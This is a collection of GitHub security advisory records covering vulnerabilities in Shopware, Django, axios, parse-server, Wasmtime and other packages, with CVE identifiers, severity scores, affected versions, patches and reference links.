2021-06-25T15:29:10Z
2021-09-08T18:00:32Z
null
['CVE-2021-32711']
Exposure of Sensitive Information to an Unauthorized Actor
Shopware is an open source eCommerce platform. Versions prior to 6.3.5.1 may leak of information via Store-API. The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. We recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. Please check your plugins if you have it in use. Detailed technical information can be found in the upgrade information. https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351 ### Workarounds For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 ### For more information https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-f2vv-h5x4-57gr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32711'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/157fb84a8b3b4ace4be165a033d559826704829b'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021'}]
{'cwe_ids': ['CWE-200'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:29:10Z', 'nvd_published_at': '2021-06-24T20:15:00Z'}
1.4.0
GHSA-c7vg-w8q8-c3wf
2021-06-25T15:35:07Z
2021-09-08T18:00:20Z
null
['CVE-2021-32710']
Session Fixation
Shopware is an open source eCommerce platform. Potential session hijacking of store customers in versions below 6.3.5.2. We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.1'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-h9q8-5gv2-v6mg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32710'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/010c0154bea57c1fca73277c7431d029db7a972e'}]
{'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:35:07Z', 'nvd_published_at': '2021-06-24T20:15:00Z'}
1.4.0
GHSA-hxj6-v58r-cqv3
2021-08-30T21:28:33Z
2021-09-01T18:31:45Z
null
['CVE-2020-22392']
Cross Site Scripting in Subrion CMS
Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.2 when adding a blog and then editing an image file.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'intelliants/subrion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.2.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-22392'}, {'type': 'WEB', 'url': 'https://github.com/intelliants/subrion/issues/868'}, {'type': 'PACKAGE', 'url': 'https://github.com/intelliants/subrion'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:28:33Z', 'nvd_published_at': '2021-08-05T22:15:00Z'}
1.4.0
GHSA-xpfp-f569-q3p2
2021-08-25T22:24:11Z
2021-09-22T17:34:49Z
null
['CVE-2021-35042']
SQL Injection in Django
Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.db.models.query.QuerySet.order_by']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.5'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.db.models.query.QuerySet.order_by']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.13'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35042'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/0bd57a879a0d54920bb9038a732645fb917040e9'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/a34a5f724c5d5adb2109374ba3989ebb7b11f81f'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SS6NJTBYWOX6J7G4U3LUOILARJKWPQ5Y/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210805-0008/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/jul/01/security-releases/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2021/07/02/2'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-03T00:06:31Z', 'nvd_published_at': '2021-07-02T10:15:00Z'}
1.4.0
GHSA-84p7-fh9c-6g8h
2021-09-16T21:30:18Z
2021-09-20T19:52:24Z
null
[]
Prototype Pollution in mixme
### Impact When copying properties from a source object to a target object, the target object can gain access to certain properties of the source object and modify their content. ### Patches The problem was patch with a more agressive discovery of secured properties to filter out.
[]
[{'package': {'ecosystem': 'npm', 'name': 'mixme'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/security/advisories/GHSA-84p7-fh9c-6g8h'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-mixme/commit/db70fe9bcbba451e9f8bd794a9fa7cdfa00125ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/adaltas/node-mixme'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-79jw-6wg7-r9g4'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T21:30:18Z', 'nvd_published_at': None}
1.4.0
GHSA-cqqh-49mx-fq63
2022-08-10T23:45:09Z
2021-09-13T20:16:54Z
null
['CVE-2021-3645']
merge vulnerable to Prototype Pollution
merge is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': '@viking04/merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3645'}, {'type': 'WEB', 'url': 'https://github.com/viking04/merge/commit/baba40332080b38b33840d2614df6d4142dedaf6'}, {'type': 'PACKAGE', 'url': 'https://github.com/viking04/merge'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ef387a9e-ca3c-4c21-80e3-d34a6a896262'}]
{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:14:06Z', 'nvd_published_at': '2021-09-10T11:15:00Z'}
1.4.0
GHSA-q4h9-46xg-m3x9
2021-09-14T22:17:40Z
2021-09-15T20:22:13Z
null
[]
UUPSUpgradeable vulnerability in @openzeppelin/contracts-upgradeable
### Impact Upgradeable contracts using `UUPSUpgradeable` may be vulnerable to an attack affecting uninitialized implementation contracts. We will update this advisory with more information soon. ### Patches A fix is included in version 4.3.2 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`. ### Workarounds Initialize implementation contracts using `UUPSUpgradeable` by invoking the initializer function (usually called `initialize`). An example is provided [in the forum](https://forum.openzeppelin.com/t/security-advisory-initialize-uups-implementation-contracts/15301). ### References A post-mortem will be published in a few days in the [OpenZeppelin Forum](https://forum.openzeppelin.com/). ### For more information If you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com.
[]
[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.3.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/security/advisories/GHSA-q4h9-46xg-m3x9'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-14T22:17:40Z', 'nvd_published_at': None}
1.4.0
GHSA-cph5-m8f7-6c5x
2022-09-14T21:28:32Z
2021-09-01T18:23:02Z
null
['CVE-2021-3749']
axios Inefficient Regular Expression Complexity vulnerability
axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'axios'}, 'ecosystem_specific': {'affected_functions': ['axios.utils.trim']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3749'}, {'type': 'WEB', 'url': 'https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/axios/axios'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r075d464dce95cd13c03ff9384658edcccd5ab2983b82bfc72b62bb10@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r216f0fd0a3833856d6a6a1fada488cadba45f447d87010024328ccf2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3ae6d2654f92c5851bdb73b35e96b0e4e3da39f28ac7a1b15ae3aab8@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4bf1b32983f50be00f9752214c1b53738b621be1c2b0dbd68c7f2391@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7324ecc35b8027a51cb6ed629490fcd3b2d7cf01c424746ed5744bf1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74d0b359408fff31f87445261f0ee13bdfcac7d66f6b8e846face321@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra15d63c54dc6474b29f72ae4324bcb03038758545b3ab800845de7a1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc263bfc5b53afcb7e849605478d73f5556eb0c00d1f912084e407289@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfa094029c959da0f7c8cd7dc9c4e59d21b03457bf0cedf6c93e1bb0a@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc5c478053ff808671aef170f3d9fc9d05cc1fab8fb64431edc66103@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/axios'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]
{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-01T18:14:02Z', 'nvd_published_at': '2021-08-31T11:15:00Z'}
1.4.0
GHSA-6whf-q6p5-84wg
2021-10-06T13:23:34Z
2021-09-29T17:16:07Z
null
['CVE-2021-38299']
Improper Access Control in Webauthn Framework
Webauthn Framework 3.3.x before 3.3.4 has Incorrect Access Control. An attacker that controls a user's system is able to login to a vulnerable service using an attached FIDO2 authenticator without passing a check of the user presence.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'web-auth/webauthn-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38299'}, {'type': 'WEB', 'url': 'https://github.com/web-auth/webauthn-framework/commit/572e239c5702667ca52487faf861abc768a46308'}, {'type': 'PACKAGE', 'url': 'https://github.com/web-auth/webauthn-framework'}, {'type': 'WEB', 'url': 'https://github.com/web-auth/webauthn-framework/releases'}, {'type': 'WEB', 'url': 'https://github.com/web-auth/webauthn-framework/releases/tag/v3.3.4'}, {'type': 'WEB', 'url': 'https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2021-1-fehlende-ueberpruefung-von-user-presence-in-webauthn-framework/'}]
{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-28T21:04:00Z', 'nvd_published_at': '2021-09-27T06:15:00Z'}
1.4.0
GHSA-2r2w-jrh2-p4gr
2023-09-19T10:09:11Z
2021-09-09T17:08:55Z
null
['CVE-2021-31274']
Cross-site Scripting in LibreNMS
In LibreNMS < 21.3.0, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api->description variable. As a result, arbitrary Javascript code can get executed.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.3.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31274'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/12739'}, {'type': 'WEB', 'url': 'https://community.librenms.org/t/vulnerability-report-cross-site-scripting-xss-in-the-api-access-page/15431'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms/'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T13:32:48Z', 'nvd_published_at': '2021-09-08T18:15:00Z'}
1.4.0
GHSA-g452-6rfc-vrvx
2021-08-30T21:26:46Z
2021-09-01T18:31:53Z
null
['CVE-2021-23419']
Prototype Pollution in open-graph
This affects the package open-graph before 0.2.6. The function parse could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor payload.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'open-graph'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23419'}, {'type': 'WEB', 'url': 'https://github.com/samholmes/node-open-graph/commit/a0cef507a90adaac7dbbe9c404f09a50bdefb348'}, {'type': 'PACKAGE', 'url': 'https://github.com/samholmes/node-open-graph'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-OPENGRAPH-1536747'}]
{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T21:26:31Z', 'nvd_published_at': '2021-08-08T08:15:00Z'}
1.4.0
GHSA-7pr3-p5fm-8r9x
2021-09-30T16:43:12Z
2021-09-30T17:09:47Z
null
['CVE-2021-41109']
LiveQuery publishes user session tokens in parse-server
### Impact For regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload. ### Patches Remove session token from LiveQuery payload. ### Workaround Set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-7pr3-p5fm-8r9x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41109'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/4.10.4'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-30T16:43:12Z', 'nvd_published_at': '2021-09-30T15:15:00Z'}
1.4.0
GHSA-w3j4-76qw-wwjm
2021-09-08T14:47:05Z
2021-09-07T23:08:24Z
null
['CVE-2021-39197']
Older releases of better_errors open to Cross-Site Request Forgery attack
### Impact better_errors prior to 2.8.0 did not implement CSRF protection for its internal requests. It also did not enforce the correct "Content-Type" header for these requests, which allowed a cross-origin "simple request" to be made without CORS protection. These together left an application with better_errors enabled open to cross-origin attacks. _As a developer tool, better_errors documentation strongly recommends addition only to the `development` bundle group, so this vulnerability should only affect development environments. Please ensure that your project limits better_errors to the `development` group (or the non-Rails equivalent)._ ### Patches Starting with release 2.8.x, CSRF protection is enforced. It is recommended that you upgrade to the latest release, or minimally to "~> 2.8.3". ### Workarounds There are no known workarounds to mitigate the risk of using older releases of better_errors. ### References - Chris Moberly provided [an example attack that uses a now-patched vulnerability of webpack-dev-server in conjunction with Better Errors](https://about.gitlab.com/blog/2021/09/07/why-are-developers-vulnerable-to-driveby-attacks/) ### For more information If you have any questions or comments about this advisory, please - Add to the [discussion in better_errors](https://github.com/BetterErrors/better_errors/discussions/507) - Open an issue in [better_errors](https://github.com/BetterErrors/better_errors)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'better_errors'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/security/advisories/GHSA-w3j4-76qw-wwjm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39197'}, {'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/pull/474'}, {'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/commit/8e8e796bfbde4aa088741823c8a3fc6df2089bb0'}, {'type': 'PACKAGE', 'url': 'https://github.com/BetterErrors/better_errors'}, {'type': 'WEB', 'url': 'https://github.com/BetterErrors/better_errors/discussions/507'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/better_errors/CVE-2021-39197.yml'}]
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T17:58:52Z', 'nvd_published_at': '2021-09-07T18:15:00Z'}
1.4.0
GHSA-87p2-cvhq-q4mv
2021-09-13T20:32:55Z
2021-09-07T22:56:56Z
null
['CVE-2020-13929']
Authentication bypass in Apache Zeppelin
Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.zeppelin:zeppelin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13929'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/zeppelin'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028%40%3Cusers.zeppelin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cusers.zeppelin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r99529e175a7c1c9a26bd41a02802c8af7aa97319fe561874627eb999@%3Cusers.zeppelin.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/09/02/2'}]
{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-03T20:16:12Z', 'nvd_published_at': '2021-09-02T17:15:00Z'}
1.4.0
GHSA-4873-36h9-wv49
2021-09-17T20:05:58Z
2021-09-20T19:54:16Z
null
['CVE-2021-39218']
Out-of-bounds read/write and invalid free with `externref`s and GC safepoints in Wasmtime
### Impact There was an invalid free and out-of-bounds read and write bug when running Wasm that uses `externref`s in Wasmtime. To trigger this bug, Wasmtime needs to be running Wasm that uses `externref`s, the host creates non-null `externrefs`, Wasmtime performs a garbage collection (GC), and there has to be a Wasm frame on the stack that is at a GC safepoint where * there are no live references at this safepoint, and * there is a safepoint with live references earlier in this frame's function. Under this scenario, Wasmtime would incorrectly use the GC stack map for the safepoint from earlier in the function instead of the empty safepoint. This would result in Wasmtime treating arbitrary stack slots as `externref`s that needed to be rooted for GC. At the *next* GC, it would be determined that nothing was referencing these bogus `externref`s (because nothing could ever reference them, because they are not really `externref`s) and then Wasmtime would deallocate them and run `<ExternRef as Drop>::drop` on them. This results in a free of memory that is not necessarily on the heap (and shouldn't be freed at this moment even if it was), as well as potential out-of-bounds reads and writes. Even though support for `externref`s (via the reference types proposal) is enabled by default, unless you are creating non-null `externref`s in your host code or explicitly triggering GCs, you cannot be affected by this bug. We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare. ### Patches This bug has been patched and users should upgrade to Wasmtime version 0.30.0. Additionally, we have updated [our primary `externref` fuzz target](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/fuzz/fuzz_targets/table_ops.rs) such that it better exercises these code paths and we can have greater confidence in their correctness going forward. ### Workarounds If you cannot upgrade Wasmtime at this time, you can avoid this bug by disabling the reference types proposal by passing `false` to [`wasmtime::Config::wasm_reference_types`](https://docs.rs/wasmtime/0.29.0/wasmtime/struct.Config.html#method.wasm_reference_types) ### References * [The Wasm reference types proposal, which introduces `externref`](https://github.com/WebAssembly/reference-types/) ### For more information If you have any questions or comments about this advisory: * Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime) * Open an issue in [the `bytecodealliance/wasmtime` repository](https://github.com/bytecodealliance/wasmtime/)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'wasmtime'}, 'ecosystem_specific': {'affected_functions': ['wasmtime::Linker::func_new', 'wasmtime::Linker::func_wrap', 'wasmtime::Store::gc']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.26.0'}, {'fixed': '0.30.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-4873-36h9-wv49'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39218'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/wasmtime/commit/398a73f0dd862dbe703212ebae8e34036a18c11c'}, {'type': 'WEB', 'url': 'https://crates.io/crates/wasmtime'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/wasmtime'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAVBRYDDUIY2ZR3K3FO4BVYJKIMJ5TP7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z2Z33FTXFQ6EOINVEQIP4DFBG53G5XIY/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0110.html'}]
{'cwe_ids': ['CWE-125', 'CWE-590', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T20:05:58Z', 'nvd_published_at': '2021-09-17T21:15:00Z'}